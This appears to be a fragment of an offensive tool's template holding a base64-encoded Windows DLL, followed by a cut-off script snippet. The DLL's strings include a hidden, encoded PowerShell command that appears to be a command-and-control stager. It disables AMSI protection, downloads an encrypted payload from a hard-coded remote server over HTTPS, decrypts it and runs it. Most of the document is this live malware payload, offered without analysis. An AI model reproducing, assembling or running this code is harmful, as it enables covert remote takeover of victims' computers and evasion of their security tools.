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BRDhBZXdBa0FGOEFmUUI4QUNVQWV3QWtBRjhBTGdCSEFFVUFWQUJHQUdrQVpRQnNBR1FBS0FBbkFHRUFiUUJ6QUdrQVNRQnVBR2tBZEFCR0FHRUFhUUJzQUdVQVpBQW5BQ3dBSndCT0FHOEFiZ0JRQUhVQVlnQnNBR2tBWXdBc0FGTUFkQUJoQUhRQWFRQmpBQ2NBS1FBdUFGTUFaUUJVQUZZQVFRQnNBSFVBWlFBb0FDUUFUZ0IxQUV3QVRBQXNBQ1FBVkFCU0FIVUFSUUFwQUgwQU93QmJBRk1BV1FCekFGUUFSUUJOQUM0QVRnQkZBSFFBTGdCVEFFVUFjZ0JXQUVrQVl3QkZBRkFBYndCcEFHNEFkQUJOQUdFQWJnQkJBR2NBWlFCU0FGMEFPZ0E2QUVVQVdBQlFBR1VBUXdCVUFERUFNQUF3QUVNQVR3Qk9BSFFBU1FCdUFGVUFSUUE5QURBQU93QWtBRmNBWXdBOUFFNEFSUUIzQUMwQVR3QmlBRW9BWlFCREFGUUFJQUJUQUZrQVV3QlVBRVVBYlFBdUFFNEFaUUJVQUM0QVZ3QkZBR0lBUXdCc0FHa0FaUUJ1QUZRQU93QWtBSFVBUFFBbkFFMEFid0I2QUdrQWJBQnNBR0VBTHdBMUFDNEFNQUFnQUNnQVZ3QnBBRzRBWkFCdkFIY0Fjd0FnQUU0QVZBQWdBRFlBTGdBeEFEc0FJQUJYQUU4QVZ3QTJBRFFBT3dBZ0FGUUFjZ0JwQUdRQVpRQnVBSFFBTHdBM0FDNEFNQUE3QUNBQWNnQjJBRG9BTVFBeEFDNEFNQUFwQUNBQWJBQnBBR3NBWlFBZ0FFY0FaUUJqQUdzQWJ3QW5BRHNBV3dCVEFIa0Fjd0IwQUdVQWJRQXVBRTRBWlFCMEFDNEFVd0JsQUhJQWRnQnBBR01BWlFCUUFHOEFhUUJ1QUhRQVRRQmhBRzRBWVFCbkFHVUFjZ0JkQURvQU9nQlRBR1VBY2dCMkFHVUFjZ0JEQUdVQWNnQjBBR2tBWmdCcEFHTUFZUUIwQUdVQVZnQmhBR3dBYVFCa0FHRUFkQUJwQUc4QWJnQkRBR0VBYkFCc0FHSUFZUUJqQUdzQUlBQTlBQ0FBZXdBa0FIUUFjZ0IxQUdVQWZRQTdBQ1FBVndCakFDNEFTQUJsQUdFQVJBQkZBRklBVXdBdUFFRUFaQUJFQUNnQUp3QlZBSE1BWlFCeUFDMEFRUUJuQUdVQWJnQjBBQ2NBTEFBa0FIVUFLUUE3QUNRQVZ3QkRBQzRBVUFCU0FHOEFlQUJaQUQwQVd3QlRBSGtBY3dCMEFHVUFiUUF1QUU0QVJRQjBBQzRBVndCbEFHSUFVZ0JsQUZFQVZRQmxBRk1BZEFCZEFEb0FPZ0JFQUVVQVpnQmhBRlVBVEFCVUFGY0FSUUJpQUZBQWNnQnZBSGdBV1FBN0FDUUFkd0JEQUM0QVVBQlNBRzhBV0FCNUFDNEFRd0J5QUVVQVJBQkZBRzRBVkFCcEFFRUFUQUJ6QUNBQVBRQWdBRnNBVXdCNUFITUFkQUJsQUUwQUxnQk9BR1VBZEFBdUFFTUFjZ0JGQUVRQVpRQnVBSFFBU1FCQkFFd0FRd0JCQUdNQWFBQmxBRjBBT2dBNkFFUUFaUUJtQUVFQVZRQk1BRlFBVGdCRkFGUUFkd0JQQUZJQVN3QkRBSElBUlFCRUFFVUFiZ0IwQUdrQVFRQk1BRk1BT3dBa0FFc0FQUUJiQUZNQWVRQlRBSFFBUlFCdEFDNEFWQUJGQUZnQVZBQXVBRVVBYmdCREFHOEFSQUJwQUU0QVp3QmRBRG9BT2dCQkFGTUFRd0JKQUVrQUxnQkhBR1VBZEFCQ0FGa0FWQUJsQUhNQUtBQW5BREFBTUFCbEFEVUFNUUJoQURjQVl3QmlBR0VBWXdCbUFEZ0FZUUEwQURBQU1RQmhBR1lBWkFCakFHUUFPUUExQURVQU1RQTBBR1lBWVFCa0FEa0FaUUFuQUNrQU93QWtBRklBUFFCN0FDUUFSQUFzQUNRQVN3QTlBQ1FBUVFCU0FFY0FVd0E3QUNRQVV3QTlBREFBTGdBdUFESUFOUUExQURzQU1BQXVBQzRBTWdBMUFEVUFmQUFsQUhzQUpBQktBRDBBS0FBa0FFb0FLd0FrQUZNQVd3QWtBRjhBWFFBckFDUUFTd0JiQUNRQVh3QWxBQ1FBU3dBdUFFTUFid0IxQUc0QVZBQmRBQ2tBSlFBeUFEVUFOZ0E3QUNRQVV3QmJBQ1FBWHdCZEFDd0FKQUJUQUZzQUpBQktBRjBBUFFBa0FGTUFXd0FrQUVvQVhRQXNBQ1FBVXdCYkFDUUFYd0JkQUgwQU93QWtBRVFBZkFBbEFIc0FKQUJKQUQwQUtBQWtBRWtBS3dBeEFDa0FKUUF5QURVQU5nQTdBQ1FBU0FBOUFDZ0FKQUJJQUNzQUpBQlRBRnNBSkFCSkFGMEFLUUFsQURJQU5RQTJBRHNBSkFCVEFGc0FKQUJKQUYwQUxBQWtBRk1BV3dBa0FFZ0FYUUE5QUNRQVV3QmJBQ1FBU0FCZEFDd0FKQUJUQUZzQUpBQkpBRjBBT3dBa0FGOEFMUUJDQUZnQWJ3QlNBQ1FBVXdCYkFDZ0FKQUJUQUZzQUpBQkpBRjBBS3dBa0FGTUFXd0FrQUVnQVhRQXBBQ1VBTWdBMUFEWUFYUUI5QUgwQU93QWtBSGNBUXdBdUFFZ0FSUUJCQUdRQVJRQnlBSE1BTGdCQkFHUUFaQUFvQUNJQVF3QnZBRzhBYXdCcEFHVUFJZ0FzQUNJQWN3QmxBSE1BY3dCcEFHOEFiZ0E5QUdjQWRBQkhBRTBBVkFCSUFFZ0FUd0JyQUNzQU53QmhBRlFBWXdCaEFHTUFkUUJvQUdNQVp3QkhBR2dBWndCSUFHc0FTQUJKQUQwQUlnQXBBRHNBSkFCekFHVUFjZ0E5QUNjQWFBQjBBSFFBY0FCekFEb0FMd0F2QURFQU1BQTBBQzRBTWdBekFEWUFMZ0F4QURrQU5nQXVBRFVBTmdBNkFEUUFOQUF6QUNjQU93QWtBSFFBUFFBbkFDOEFiQUJ2QUdjQWFRQnVBQzhBY0FCeUFHOEFZd0JsQUhNQWN3QXVBSEFBYUFCd0FDY0FPd0FrQUVRQVFRQlVBR0VBUFFBa0FGY0FRd0F1QUVRQWJ3QjNBRTRBVEFCUEFHRUFSQUJFQUVFQVZBQkJBQ2dBSkFCVEFHVUFVZ0FyQUNRQVZBQXBBRHNBSkFCSkFIWUFQUUFrQUdRQVFRQjBBRUVBV3dBd0FDNEFMZ0F6QUYwQU93QWtBR1FBUVFCVUFFRUFQUUFrQUdRQVFRQlVBR0VBV3dBMEFDNEFMZ0FrQUVRQVFRQjBBR0VBTGdCc0FFVUFiZ0JIQUZRQWFBQmRBRHNBTFFCS0FFOEFhUUJ1QUZzQVF3Qm9BR0VBY2dCYkFGMEFYUUFvQUNZQUlBQWtBRklBSUFBa0FHUUFZUUJVQUdFQUlBQW9BQ1FBU1FCV0FDc0FKQUJMQUNrQUtRQjhBRWtBUlFCWUFBPT0AAFNcYiBQXGKQGFxiTWluZ3ctdzY0IHJ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AynMAANRzAADecwAA5nMAAPJzAAAAAAAAhHEAAJZxAACucQAAxnEAANpxAADwcQAABnIAABZyAAAqcgAAPHIAAFZyAABmcgAAgnIAAJpyAAC0cgAA0nIAANpyAADucgAA/HIAABhzAAAqcwAAOnMAAAAAAABQcwAAXnMAAGxzAAB4cwAAgHMAAIhzAACScwAAmnMAAKRzAACucwAAuHMAAMBzAADKcwAA1HMAAN5zAADmcwAA8nMAAAAAAACoAENyZWF0ZVByb2Nlc3NBAADVAERlbGV0ZUNyaXRpY2FsU2VjdGlvbgDxAEVudGVyQ3JpdGljYWxTZWN0aW9uAADGAUdldEN1cnJlbnRQcm9jZXNzAMcBR2V0Q3VycmVudFByb2Nlc3NJZADLAUdldEN1cnJlbnRUaHJlYWRJZAAABQJHZXRMYXN0RXJyb3IAABcCR2V0TW9kdWxlSGFuZGxlQQAARwJHZXRQcm9jQWRkcmVzcwAAfQJHZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQCZAkdldFRpY2tDb3VudAAA7QJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uACgDTGVhdmVDcml0aWNhbFNlY3Rpb24AAJgDUXVlcnlQZXJmb3JtYW5jZUNvdW50ZXIAbQRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAegRTbGVlcACIBFRlcm1pbmF0ZVByb2Nlc3MAAI8EVGxzR2V0VmFsdWUAnARVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAALwEVmlydHVhbFByb3RlY3QAAL8EVmlydHVhbFF1ZXJ5AADIBFdhaXRGb3JTaW5nbGVPYmplY3QAMABfX2RsbG9uZXhpdAB9AF9hbXNnX2V4aXQAABgBX2luaXR0ZXJtABwBX2lvYgAAfQFfbG9jawAaAl9vbmV4aXQAwgNmcmVlAADLA2Z3cml0ZQAA9wNtYWxsb2MAAP8DbWVtc2V0AAAIBHB1dHMAACUEc3RybGVuAAAnBHN0cm5jbXAApwJfdW5sb2NrAPoCYWJvcnQAcgR2ZnByaW50ZgAAowNjYWxsb2MAAABwAAAAcAAAAHAAAABwAAAAcAAAAHAAAABwAAAAcAAAAHAAAABwAAAAcAAAAHAAAABwAAAAcAAAAHAAAABwAAAAcAAAAHAAAABwAAAAcAAAAHAAAABwAABLRVJORUwzMi5kbGwAAAAAFHAAABRwAAAUcAAAFHAAABRwAAAUcAAAFHAAABRwAAAUcAAAFHAAABRwAAAUcAAAFHAAABRwAAAUcAAAFHAAABRwAABtc3ZjcnQuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQXGIAAAAAAAAAAJAYXGJAGFxiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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" \$path_opt = "%s" \$exec_opt = "%s" if 